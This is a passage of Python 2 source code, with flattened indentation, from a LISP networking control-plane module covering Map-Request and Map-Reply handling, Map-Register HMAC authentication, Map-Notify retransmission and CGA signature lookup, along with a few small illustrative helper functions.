else:
lookup_eid = mr.eid
lookup_group = mr.group
#endif
#
# Do longest match on EID into DDT referral cache.
#
referral = lisp_referral_cache_lookup(lookup_eid, lookup_group, False)
if (referral == None):
lprint("No referral cache entry found")
lisp_send_negative_map_reply(lisp_sockets, lookup_eid, lookup_group,
nonce, itr, mr.sport, 15, None, False)
return
#endif
ref_str = referral.print_eid_tuple()
lprint("Found referral cache entry {}, referral-type: {}".format(ref_str,
referral.print_referral_type()))
ref_node = lisp_get_referral_node(referral, mr_source, mr.eid)
if (ref_node == None):
lprint("No reachable referral-nodes found")
mr.dequeue_map_request()
lisp_send_negative_map_reply(lisp_sockets, referral.eid,
referral.group, nonce, itr, mr.sport, 1, None, False)
return
#endif
lprint("Send DDT Map-Request to {} {} for EID {}, nonce 0x{}". \
format(ref_node.referral_address.print_address(),
referral.print_referral_type(), green(eid_str, False),
lisp_hex_string(nonce)))
#
# Encapsulate Map-Request and send out.
#
to_ms = (referral.referral_type == LISP_DDT_ACTION_MS_REFERRAL or
referral.referral_type == LISP_DDT_ACTION_MS_ACK)
lisp_send_ecm(lisp_sockets, mr.packet, mr_source, mr.sport, mr.eid,
ref_node.referral_address, to_ms=to_ms, ddt=True)
#
# Do some stats.
#
mr.last_request_sent_to = ref_node.referral_address
mr.last_sent = lisp_get_timestamp()
mr.send_count += 1
ref_node.map_requests_sent += 1
return
#enddef
#
# lisp_mr_process_map_request
#
# Process a Map-Request received from an ITR. The Map-Resolver needs to
# forward this Map-Request to the longest-matched referral from the
# referral-cache.
#
def lisp_mr_process_map_request(lisp_sockets, packet, map_request, ecm_source,
sport, mr_source):
eid = map_request.target_eid
group = map_request.target_group
deid_str = map_request.print_eid_tuple()
seid_str = mr_source.print_address()
nonce = map_request.nonce
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Received Map-Request from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format("P" if map_request.pitr_bit else "",
red(ecm_source.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Queue the Map-Request. We need to reliably transmit it.
#
mr = lisp_ddt_map_request(lisp_sockets, packet, eid, group, nonce)
mr.packet = packet
mr.itr = ecm_source
mr.mr_source = mr_source
mr.sport = sport
mr.from_pitr = map_request.pitr_bit
mr.queue_map_request()
lisp_send_ddt_map_request(mr, False)
return
#enddef
#
# lisp_process_map_request
#
# Process received Map-Request as a Map-Server or an ETR.
#
def lisp_process_map_request(lisp_sockets, packet, ecm_source, ecm_port,
mr_source, mr_port, ddt_request, ttl):
orig_packet = packet
map_request = lisp_map_request()
packet = map_request.decode(packet, mr_source, mr_port)
if (packet == None):
lprint("Could not decode Map-Request packet")
return
#endif
map_request.print_map_request()
#
# If RLOC-probe request, process separately.
#
if (map_request.rloc_probe):
lisp_process_rloc_probe_request(lisp_sockets, map_request,
mr_source, mr_port, ttl)
return
#endif
#
# Process SMR.
#
if (map_request.smr_bit):
lisp_process_smr(map_request)
#endif
#
# Process SMR-invoked Map-Request.
#
if (map_request.smr_invoked_bit):
lisp_process_smr_invoked_request(map_request)
#endif
#
# Do ETR processing of the Map-Request if we found a database-mapping.
#
if (lisp_i_am_etr):
lisp_etr_process_map_request(lisp_sockets, map_request, mr_source,
mr_port, ttl)
#endif
#
# Do Map-Server processing of the Map-Request.
#
if (lisp_i_am_ms):
packet = orig_packet
eid, group, ddt_action = lisp_ms_process_map_request(lisp_sockets,
orig_packet, map_request, mr_source, mr_port, ecm_source)
if (ddt_request):
lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source,
ecm_port, ddt_action, eid, group)
#endif
return
#endif
#
# Map-Request is from an ITR destined to a Map-Resolver.
#
if (lisp_i_am_mr and not ddt_request):
lisp_mr_process_map_request(lisp_sockets, orig_packet, map_request,
ecm_source, mr_port, mr_source)
#endif
#
# Do DDT-node processing of the Map-Request.
#
if (lisp_i_am_ddt or ddt_request):
packet = orig_packet
lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source,
ecm_port)
#endif
return
#enddef
#
# lisp_store_mr_stats
#
# Store counter and timing stats for the map-resolver that just sent us a
# negative Map-Reply.
#
def lisp_store_mr_stats(source, nonce):
mr = lisp_get_map_resolver(source, None)
if (mr == None): return
#
# Count and record timestamp.
#
mr.neg_map_replies_received += 1
mr.last_reply = lisp_get_timestamp()
#
# For every 100 replies, reset the total_rtt so we can get a new average.
#
if ((mr.neg_map_replies_received % 100) == 0): mr.total_rtt = 0
#
# If Map-Reply matches stored nonce, then we can do an RTT calculation.
#
if (mr.last_nonce == nonce):
mr.total_rtt += (time.time() - mr.last_used)
mr.last_nonce = 0
#endif
if ((mr.neg_map_replies_received % 10) == 0): mr.last_nonce = 0
return
#enddef
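#
# example_windowed_average
#
# A minimal sketch of the averaging idea behind the total_rtt reset above:
# only a recent window of samples contributes to the mean. Hypothetical
# helper, not called anywhere in this module.
#
def example_windowed_average(samples, window=100):
    recent = samples[-window:]
    if (recent == []): return(0.0)
    return(sum(recent) / float(len(recent)))
#enddef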
#
# lisp_process_map_reply
#
# Process received Map-Reply.
#
def lisp_process_map_reply(lisp_sockets, packet, source, ttl):
global lisp_map_cache
map_reply = lisp_map_reply()
packet = map_reply.decode(packet)
if (packet == None):
lprint("Could not decode Map-Reply packet")
return
#endif
map_reply.print_map_reply()
#
# Process each EID record in Map-Reply message.
#
rloc_key_change = None
for i in range(map_reply.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Reply packet")
return
#endif
eid_record.print_record(" ", False)
#
# If negative Map-Reply, see if from a Map-Resolver, do some counting
# and timing stats.
#
if (eid_record.rloc_count == 0):
lisp_store_mr_stats(source, map_reply.nonce)
#endif
multicast = (eid_record.group.is_null() == False)
#
# If this is a (0.0.0.0/0, G) with drop-action, we don't want to
# cache a more-specific (S,G) entry. It is a startup timing problem.
#
if (lisp_decent_push_configured):
action = eid_record.action
if (multicast and action == LISP_DROP_ACTION):
if (eid_record.eid.is_local()): continue
#endif
#endif
#
# Some RLOC-probe Map-Replies may have no EID value in the EID-record.
# Like from RTRs or PETRs.
#
if (eid_record.eid.is_null()): continue
#
# Do not lose state for other RLOCs that may be stored in an already
# cached map-cache entry.
#
if (multicast):
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
else:
mc = lisp_map_cache.lookup_cache(eid_record.eid, True)
#endif
new_mc = (mc == None)
#
# Process each RLOC record in EID record.
#
rloc_set = []
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
rloc_record.keys = map_reply.keys
packet = rloc_record.decode(packet, map_reply.nonce)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Reply packet")
return
#endif
rloc_record.print_record(" ")
old_rloc = None
if (mc): old_rloc = mc.get_rloc(rloc_record.rloc)
if (old_rloc):
rloc = old_rloc
else:
rloc = lisp_rloc()
#endif
#
# Copy RLOC data from record, add to locator-set. Check to see
# if the RLOC has been translated by a NAT. If so, go get the
# translated port and store in rloc entry.
#
port = rloc.store_rloc_from_record(rloc_record, map_reply.nonce,
source)
rloc.echo_nonce_capable = map_reply.echo_nonce_capable
if (rloc.echo_nonce_capable):
addr_str = rloc.rloc.print_address_no_iid()
if (lisp_get_echo_nonce(None, addr_str) == None):
lisp_echo_nonce(addr_str)
#endif
#endif
#
# Process state for RLOC-probe reply from this specific RLOC. And
# update RLOC state for the map-cache entry. Ignore an RLOC with a
# different address-family than the received packet. The ITR really
# doesn't know it can reach the RLOC unless it probes for that
# address-family.
#
if (map_reply.rloc_probe and rloc_record.probe_bit):
if (rloc.rloc.afi == source.afi):
lisp_process_rloc_probe_reply(rloc.rloc, source, port,
map_reply.nonce, map_reply.hop_count, ttl)
#endif
#endif
#
# Append to rloc-set array to be stored in map-cache entry.
#
rloc_set.append(rloc)
#
# Did keys change for this RLOC? Flag it if so.
#
if (lisp_data_plane_security and rloc.rloc_recent_rekey()):
rloc_key_change = rloc
#endif
#endfor
#
# If the map-cache entry is for an xTR behind a NAT, we'll find an
# RTR RLOC (which is priority 254). Store private RLOCs that may
# come along with the RTR RLOC because the destination RLOC could
# be behind the same NAT as this ITR. This ITR, however, could be
# behind another NAT or in public space. We want to mark the
# private-address RLOC unreachable for the two latter cases.
#
if (map_reply.rloc_probe == False and lisp_nat_traversal):
new_set = []
log_set = []
for rloc in rloc_set:
#
# Set initial state for private RLOCs to UNREACH and test
# with RLOC-probes if up behind same NAT.
#
if (rloc.rloc.is_private_address()):
rloc.priority = 1
rloc.state = LISP_RLOC_UNREACH_STATE
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
continue
#endif
#
# An RTR should not put RTR RLOCs in its map-cache, but xTRs do.
# Non-RTR RLOCs should only go in the RTR map-cache.
#
if (rloc.priority == 254 and lisp_i_am_rtr == False):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
if (rloc.priority != 254 and lisp_i_am_rtr):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
#endfor
if (log_set != []):
rloc_set = new_set
lprint("NAT-traversal optimized RLOC-set: {}".format(log_set))
#endif
#endif
#
# If any RLOC-records do not have RLOCs, don't put them in the map-
# cache.
#
new_set = []
for rloc in rloc_set:
if (rloc.json != None): continue
new_set.append(rloc)
#endfor
if (new_set != []):
count = len(rloc_set) - len(new_set)
lprint("Pruning {} no-address RLOC-records for map-cache".format( \
count))
rloc_set = new_set
#endif
#
# If this is an RLOC-probe reply and the RLOCs are registered with
# merge semantics, this Map-Reply may not include the other RLOCs.
# In this case, do not wipe out the other RLOCs. Get them from the
# existing entry.
#
if (map_reply.rloc_probe and mc != None): rloc_set = mc.rloc_set
#
# If we are overwriting the rloc-set cached in the map-cache entry,
# then remove the old rloc pointers from the RLOC-probe list.
#
rloc_set_change = new_mc
if (mc and rloc_set != mc.rloc_set):
mc.delete_rlocs_from_rloc_probe_list()
rloc_set_change = True
#endif
#
# Add to map-cache. If this is a replace, save uptime.
#
uptime = mc.uptime if (mc) else None
mc = lisp_mapping(eid_record.eid, eid_record.group, rloc_set)
mc.mapping_source = source
mc.map_cache_ttl = eid_record.store_ttl()
mc.action = eid_record.action
mc.add_cache(rloc_set_change)
add_or_replace = "Add"
if (uptime):
mc.uptime = uptime
add_or_replace = "Replace"
#endif
lprint("{} {} map-cache with {} RLOCs".format(add_or_replace,
green(mc.print_eid_tuple(), False), len(rloc_set)))
#
# If there were any changes to the RLOC-set or the keys for any
# existing RLOC in the RLOC-set, tell the external data-plane.
#
if (lisp_ipc_dp_socket and rloc_key_change != None):
lisp_write_ipc_keys(rloc_key_change)
#endif
#
# Send RLOC-probe to highest priority RLOCs if this is a new map-cache
# entry. But if any of the RLOCs were used before in other map-cache
# entries, no need to send RLOC-probes.
#
if (new_mc):
probe = bold("RLOC-probe", False)
for rloc in mc.best_rloc_set:
addr_str = red(rloc.rloc.print_address_no_iid(), False)
lprint("Trigger {} to {}".format(probe, addr_str))
lisp_send_map_request(lisp_sockets, 0, mc.eid, mc.group, rloc)
#endfor
#endif
#endfor
return
#enddef
#
# lisp_compute_auth
#
# Create HMAC hash from packet contents stored in lisp_map_register() and
# encode it in the packet buffer.
#
def lisp_compute_auth(packet, map_register, password):
if (map_register.alg_id == LISP_NONE_ALG_ID): return(packet)
packet = map_register.zero_auth(packet)
hashval = lisp_hash_me(packet, map_register.alg_id, password, False)
#
# Store packed hash value in lisp_map_register().
#
map_register.auth_data = hashval
packet = map_register.encode_auth(packet)
return(packet)
#enddef
#
# lisp_hash_me
#
# Call HMAC hashing code from multiple places. Returns hash value.
#
def lisp_hash_me(packet, alg_id, password, do_hex):
if (alg_id == LISP_NONE_ALG_ID): return(True)
hashalg = None
if (alg_id == LISP_SHA_1_96_ALG_ID):
hashalg = hashlib.sha1
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
hashalg = hashlib.sha256
#endif
#
# Guard against unknown alg-ids so hashalg is never referenced undefined.
#
if (hashalg == None): return(None)
if (do_hex):
hashval = hmac.new(password, packet, hashalg).hexdigest()
else:
hashval = hmac.new(password, packet, hashalg).digest()
#endif
return(hashval)
#enddef
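#
# example_hash_me_usage
#
# A minimal sketch of how the HMAC above is keyed and rendered. The packet
# and password bytes are hypothetical; hexdigest() corresponds to the
# do_hex=True branch and digest() to the packed branch.
#
def example_hash_me_usage():
    import hmac as hmac_lib
    import hashlib as hashlib_lib
    packet = b"map-register-bytes"
    password = b"shared-secret"
    return(hmac_lib.new(password, packet, hashlib_lib.sha256).hexdigest())
#enddef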
#
# lisp_verify_auth
#
# Compute sha1 or sha2 hash over Map-Register packet and compare with one
# transmitted in packet that is stored in class lisp_map_register.
#
def lisp_verify_auth(packet, alg_id, auth_data, password):
if (alg_id == LISP_NONE_ALG_ID): return(True)
hashval = lisp_hash_me(packet, alg_id, password, True)
matched = (hashval == auth_data)
#
# Print both hash values if they do not match.
#
if (matched == False):
lprint("Hashed value: {} does not match packet value: {}".format( \
hashval, auth_data))
#endif
return(matched)
#enddef
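#
# example_constant_time_compare
#
# The equality check above is a straight string compare. A minimal sketch
# of a constant-time alternative, assuming Python 2.7.7 or later where
# hmac.compare_digest() exists; not called anywhere in this module.
#
def example_constant_time_compare(hashval, auth_data):
    import hmac as hmac_lib
    return(hmac_lib.compare_digest(hashval, auth_data))
#enddef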
#
# lisp_retransmit_map_notify
#
# Retransmit the already built Map-Notify message.
#
def lisp_retransmit_map_notify(map_notify):
dest = map_notify.etr
port = map_notify.etr_port
#
# Did we reach the max number of retries? We are giving up since no
# Map-Notify-Acks have been received.
#
if (map_notify.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("Map-Notify with nonce 0x{} retry limit reached for ETR {}". \
format(map_notify.nonce_key, red(dest.print_address(), False)))
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
try:
lisp_map_notify_queue.pop(key)
except:
lprint("Key not found in Map-Notify queue")
#endtry
#endif
return
#endif
lisp_sockets = map_notify.lisp_sockets
map_notify.retry_count += 1
lprint("Retransmit {} with nonce 0x{} to xTR {}, retry {}".format( \
bold("Map-Notify", False), map_notify.nonce_key,
red(dest.print_address(), False), map_notify.retry_count))
lisp_send_map_notify(lisp_sockets, map_notify.packet, dest, port)
if (map_notify.site): map_notify.site.map_notifies_sent += 1
#
# Restart retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
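#
# example_retransmit_pattern
#
# A minimal sketch of the generic retransmit shape used above and
# elsewhere in this file: resend, bump the retry count, and re-arm a
# threading.Timer until a retry cap. Hypothetical helper; state is a
# dict carrying "retries" and "timer".
#
def example_retransmit_pattern(send_func, state, interval, max_retries):
    import threading
    if (state["retries"] >= max_retries): return
    send_func()
    state["retries"] += 1
    state["timer"] = threading.Timer(interval, example_retransmit_pattern,
        [send_func, state, interval, max_retries])
    state["timer"].start()
#enddef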
#
# lisp_send_merged_map_notify
#
# Send Map-Notify with a merged RLOC-set to each ETR in the RLOC-set.
#
def lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record):
#
# Build EID-record once.
#
eid_record.rloc_count = len(parent.registered_rlocs)
packet_record = eid_record.encode()
eid_record.print_record("Merged Map-Notify ", False)
#
# Build RLOC-records for merged RLOC-set.
#
for xtr in parent.registered_rlocs:
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(xtr)
packet_record += rloc_record.encode()
rloc_record.print_record(" ")
del(rloc_record)
#endfor
#
# Build Map-Notify for each xTR that needs to receive the Map-Notify.
#
for xtr in parent.registered_rlocs:
dest = xtr.rloc
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
key_id = map_register.key_id
map_notify.key_id = key_id
map_notify.alg_id = map_register.alg_id
map_notify.auth_len = map_register.auth_len
map_notify.nonce = map_register.nonce
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(dest)
map_notify.etr_port = map_register.sport
map_notify.site = parent.site
packet = map_notify.encode(packet_record, parent.site.auth_key[key_id])
map_notify.print_notify()
#
# Put Map-Notify state on retransmission queue.
#
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
remove = lisp_map_notify_queue[key]
remove.retransmit_timer.cancel()
del(remove)
#endif
lisp_map_notify_queue[key] = map_notify
#
# Send out.
#
lprint("Send merged Map-Notify to ETR {}".format( \
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
parent.site.map_notifies_sent += 1
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
#endfor
return
#enddef
#
# lisp_build_map_notify
#
# Set up a retransmission queue entry to send the first Map-Notify.
#
def lisp_build_map_notify(lisp_sockets, eid_records, eid_list, record_count,
source, port, nonce, key_id, alg_id, auth_len, site, map_register_ack):
key = lisp_hex_string(nonce) + source.print_address()
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(eid_list)
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue[key]
s = red(source.print_address_no_iid(), False)
lprint("Map-Notify with nonce 0x{} pending for xTR {}".format( \
lisp_hex_string(map_notify.nonce), s))
return
#endif
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = record_count
map_notify.key_id = key_id
map_notify.alg_id = alg_id
map_notify.auth_len = auth_len
map_notify.nonce = nonce
map_notify.nonce_key = lisp_hex_string(nonce)
map_notify.etr.copy_address(source)
map_notify.etr_port = port
map_notify.site = site
map_notify.eid_list = eid_list
#
# Put Map-Notify state on retransmission queue.
#
if (map_register_ack == False):
key = map_notify.nonce_key
lisp_map_notify_queue[key] = map_notify
#endif
if (map_register_ack):
lprint("Send Map-Notify to ack Map-Register")
else:
lprint("Send Map-Notify for RLOC-set change")
#endif
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, site.auth_key[key_id])
map_notify.print_notify()
if (map_register_ack == False):
eid_record = lisp_eid_record()
eid_record.decode(eid_records)
eid_record.print_record(" ", False)
#endif
#
# Send out.
#
lisp_send_map_notify(lisp_sockets, packet, map_notify.etr, port)
site.map_notifies_sent += 1
if (map_register_ack): return
#
# Set retransmit timer if this is an unsolicited Map-Notify. Otherwise,
# we are acknowledging a Map-Register and the registerer is not going
# to send a Map-Notify-Ack so we shouldn't expect one.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_send_map_notify_ack
#
# Change Map-Notify message to have a new type (Map-Notify-Ack) and
# re-authenticate the message.
#
def lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms):
map_notify.map_notify_ack = True
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, ms.password)
map_notify.print_notify()
#
# Send the Map-Notify-Ack.
#
dest = ms.map_server
lprint("Send Map-Notify-Ack to {}".format(
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_multicast_map_notify
#
# Send a Map-Notify message to an xTR for the (S,G) passed into this
# function.
#
def lisp_send_multicast_map_notify(lisp_sockets, site_eid, eid_list, xtr):
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
map_notify.nonce = lisp_get_control_nonce()
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(xtr)
map_notify.etr_port = LISP_CTRL_PORT
map_notify.eid_list = eid_list
key = map_notify.nonce_key
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(map_notify.eid_list)
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue[key]
lprint("Map-Notify with nonce 0x{} pending for ITR {}".format( \
map_notify.nonce, red(xtr.print_address_no_iid(), False)))
return
#endif
#
# Put Map-Notify state on retransmission queue.
#
lisp_map_notify_queue[key] = map_notify
#
# Determine if there are any RTRs in the RLOC-set for this (S,G).
#
rtrs_exist = site_eid.rtrs_in_rloc_set()
if (rtrs_exist):
if (site_eid.is_rtr_in_rloc_set(xtr)): rtrs_exist = False
#endif
#
# Build EID-record.
#
eid_record = lisp_eid_record()
eid_record.record_ttl = 1440
eid_record.eid.copy_address(site_eid.eid)
eid_record.group.copy_address(site_eid.group)
eid_record.rloc_count = 0
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
eid_record.rloc_count += 1
#endfor
packet = eid_record.encode()
#
# Print contents of Map-Notify.
#
map_notify.print_notify()
eid_record.print_record(" ", False)
#
# Build locator-set with only RTR RLOCs if they exist.
#
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(rloc_entry)
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#
# Encode it.
#
packet = map_notify.encode(packet, "")
if (packet == None): return
#
# Send Map-Notify to xtR.
#
lisp_send_map_notify(lisp_sockets, packet, xtr, LISP_CTRL_PORT)
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_queue_multicast_map_notify
#
# This function looks for the ITRs in the local site cache.
#
def lisp_queue_multicast_map_notify(lisp_sockets, rle_list):
null_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
for sg in rle_list:
sg_site_eid = lisp_site_eid_lookup(sg[0], sg[1], True)
if (sg_site_eid == None): continue
#
# (S,G) RLOC-set could be empty when the last RLE goes away. We will have
# to search all individual registrations looking for RTRs.
#
# We store them in a dictionary array so we can remove duplicates.
#
sg_rloc_set = sg_site_eid.registered_rlocs
if (len(sg_rloc_set) == 0):
temp_set = {}
for se in sg_site_eid.individual_registrations.values():
for rloc_entry in se.registered_rlocs:
if (rloc_entry.is_rtr() == False): continue
temp_set[rloc_entry.rloc.print_address()] = rloc_entry
#endfor
#endfor
sg_rloc_set = temp_set.values()
#endif
#
# If this is a (0.0.0.0/0, G) or a (0::/0, G), we send a Map-Notify
# to all members (all RLOCs in the sg_rloc_set).
#
notify = []
found_rtrs = False
if (sg_site_eid.eid.address == 0 and sg_site_eid.eid.mask_len == 0):
notify_str = []
rle_nodes = [] if len(sg_rloc_set) == 0 else \
sg_rloc_set[0].rle.rle_nodes
for rle_node in rle_nodes:
notify.append(rle_node.address)
notify_str.append(rle_node.address.print_address_no_iid())
#endfor
lprint("Notify existing RLE-nodes {}".format(notify_str))
else:
#
# If the (S,G) has an RTR registered, then we will send a
# Map-Notify to the RTR instead of the ITRs of the source-site.
#
for rloc_entry in sg_rloc_set:
if (rloc_entry.is_rtr()): notify.append(rloc_entry.rloc)
#endfor
#
# If no RTRs were found, get ITRs from source-site.
#
found_rtrs = (len(notify) != 0)
if (found_rtrs == False):
site_eid = lisp_site_eid_lookup(sg[0], null_group, False)
if (site_eid == None): continue
for rloc_entry in site_eid.registered_rlocs:
if (rloc_entry.rloc.is_null()): continue
notify.append(rloc_entry.rloc)
#endfor
#endif
#
# No ITRs or RTRs found.
#
if (len(notify) == 0):
lprint("No ITRs or RTRs found for {}, Map-Notify suppressed". \
format(green(sg_site_eid.print_eid_tuple(), False)))
continue
#endif
#endif
#
# Send multicast Map-Notify to either ITR-list or RTR-list.
#
for xtr in notify:
lprint("Build Map-Notify to {}TR {} for {}".format("R" if \
found_rtrs else "x", red(xtr.print_address_no_iid(), False),
green(sg_site_eid.print_eid_tuple(), False)))
el = [sg_site_eid.print_eid_tuple()]
lisp_send_multicast_map_notify(lisp_sockets, sg_site_eid, el, xtr)
time.sleep(.001)
#endfor
#endfor
return
#enddef
#
# lisp_find_sig_in_rloc_set
#
# Look for a "signature" key in a JSON RLOC-record. Return the RLOC-record
# if found, otherwise return None.
#
def lisp_find_sig_in_rloc_set(packet, rloc_count):
for i in range(rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
json_sig = rloc_record.json
if (json_sig == None): continue
try:
json_sig = json.loads(json_sig.json_string)
except:
lprint("Found corrupted JSON signature")
continue
#endtry
if (json_sig.has_key("signature") == False): continue
return(rloc_record)
#endfor
return(None)
#enddef
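#
# example_find_key_in_json_list
#
# A minimal sketch of the scan-and-parse idea above, over plain JSON
# strings: tolerate corrupted JSON and return the first object carrying
# the wanted key. Hypothetical helper, not called anywhere in this module.
#
def example_find_key_in_json_list(json_strings, wanted_key):
    import json as json_lib
    for j in json_strings:
        try:
            obj = json_lib.loads(j)
        except:
            continue
        #endtry
        if (wanted_key in obj): return(obj)
    #endfor
    return(None)
#enddef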
#
# lisp_get_eid_hash
#
# From an EID, return the EID hash value. Here is an example showing the
# EID hash extracted for two hash-lengths:
#
# EID: fd4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430
# EID-hash: 4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430 eid_hash_len = 120
# EID-hash: 6dbd:3799:48e1:c6a2:9430 eid_hash_len = 80
#
# Note when an eid-prefix in lisp_eid_hashes[] has an instance-id of -1, it
# means the eid-prefix is used for all EIDs from any instance-id.
#
# Returns a string with hex digits between colons and the hash length in bits.
# Returns None if the IPv6 EID is not a crypto-hash address. These addresses
# are not authenticated.
#
def lisp_get_eid_hash(eid):
hash_mask_len = None
for eid_prefix in lisp_eid_hashes:
#
# For wildcarding the instance-ID.
#
iid = eid_prefix.instance_id
if (iid == -1): eid_prefix.instance_id = eid.instance_id
ms = eid.is_more_specific(eid_prefix)
eid_prefix.instance_id = iid
if (ms):
hash_mask_len = 128 - eid_prefix.mask_len
break
#endif
#endfor
if (hash_mask_len == None): return(None)
address = eid.address
eid_hash = ""
for i in range(0, hash_mask_len / 16):
addr = address & 0xffff
addr = hex(addr)[2:-1]
eid_hash = addr.zfill(4) + ":" + eid_hash
address >>= 16
#endfor
if (hash_mask_len % 16 != 0):
addr = address & 0xff
addr = hex(addr)[2:-1]
eid_hash = addr.zfill(2) + ":" + eid_hash
#endif
return(eid_hash[0:-1])
#enddef
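#
# example_eid_hash_bits
#
# A minimal sketch of the quad-by-quad extraction above, over a plain
# integer address. For hash_mask_len = 120 it yields 7 full quads plus
# one high-order byte, matching the "4f:5b9f:..." example in the header
# comment. Hypothetical helper, not called anywhere in this module.
#
def example_eid_hash_bits(address, hash_mask_len):
    quads = []
    for i in range(hash_mask_len // 16):
        quads.insert(0, "%04x" % (address & 0xffff))
        address >>= 16
    #endfor
    if (hash_mask_len % 16): quads.insert(0, "%02x" % (address & 0xff))
    return(":".join(quads))
#enddef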
#
# lisp_lookup_public_key
#
# Given an EID, do a mapping system lookup for a distinguished-name EID
# 'hash-<cga-hash>' to obtain the public-key from an RLOC-record.
#
# Returns [hash_eid, pubkey, True/False]. The first two values can be None;
# the last boolean indicates whether the hash lookup succeeded.
#
def lisp_lookup_public_key(eid):
iid = eid.instance_id
#
# Parse out CGA hash to do public-key lookup with instance-ID and hash
# as a distinguished-name EID.
#
pubkey_hash = lisp_get_eid_hash(eid)
if (pubkey_hash == None): return([None, None, False])
pubkey_hash = "hash-" + pubkey_hash
hash_eid = lisp_address(LISP_AFI_NAME, pubkey_hash, len(pubkey_hash), iid)
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
#
# Do lookup in local instance-ID.
#
site_eid = lisp_site_eid_lookup(hash_eid, group, True)
if (site_eid == None): return([hash_eid, None, False])
#
# Look for JSON RLOC with key "public-key".
#
pubkey = None
for rloc in site_eid.registered_rlocs:
json_pubkey = rloc.json
if (json_pubkey == None): continue
try:
json_pubkey = json.loads(json_pubkey.json_string)
except:
lprint("Registered RLOC JSON format is invalid for {}".format( \
pubkey_hash))
return([hash_eid, None, False])
#endtry
if (json_pubkey.has_key("public-key") == False): continue
pubkey = json_pubkey["public-key"]
break
#endfor
return([hash_eid, pubkey, True])
#enddef
#
# lisp_verify_cga_sig
#
# Verify signature of an IPv6 CGA-based EID if the public-key hash exists
# in the local mapping database (with same instance-ID).
#
def lisp_verify_cga_sig(eid, rloc_record):
#
# Use the signature-eid if it is in the JSON string. Otherwise, the
# crypto-EID is the signature-EID.
#
sig = json.loads(rloc_record.json.json_string)
if (lisp_get_eid_hash(eid)):
sig_eid = eid
elif (sig.has_key("signature-eid")):
sig_eid_str = sig["signature-eid"]
sig_eid = lisp_address(LISP_AFI_IPV6, sig_eid_str, 0, 0)
else:
lprint(" No signature-eid found in RLOC-record")
return(False)
#endif
#
# Look up CGA hash in mapping database to get the public-key.
#
hash_eid, pubkey, lookup_good = lisp_lookup_public_key(sig_eid)
if (hash_eid == None):
eid_str = green(sig_eid.print_address(), False)
lprint(" Could not parse hash in EID {}".format(eid_str))
return(False)
#endif
found = "found" if lookup_good else bold("not found", False)
eid_str = green(hash_eid.print_address(), False)
lprint(" Lookup for crypto-hashed EID {} {}".format(eid_str, found))
if (lookup_good == False): return(False)
if (pubkey == None):
lprint(" RLOC-record with public-key not found")
return(False)
#endif
pubkey_str = pubkey[0:8] + "..." + pubkey[-8::]
lprint(" RLOC-record with public-key '{}' found".format(pubkey_str))
#
# Get signature from RLOC-record in a form to let key.verify() do its
# thing.
#
sig_str = sig["signature"]
try:
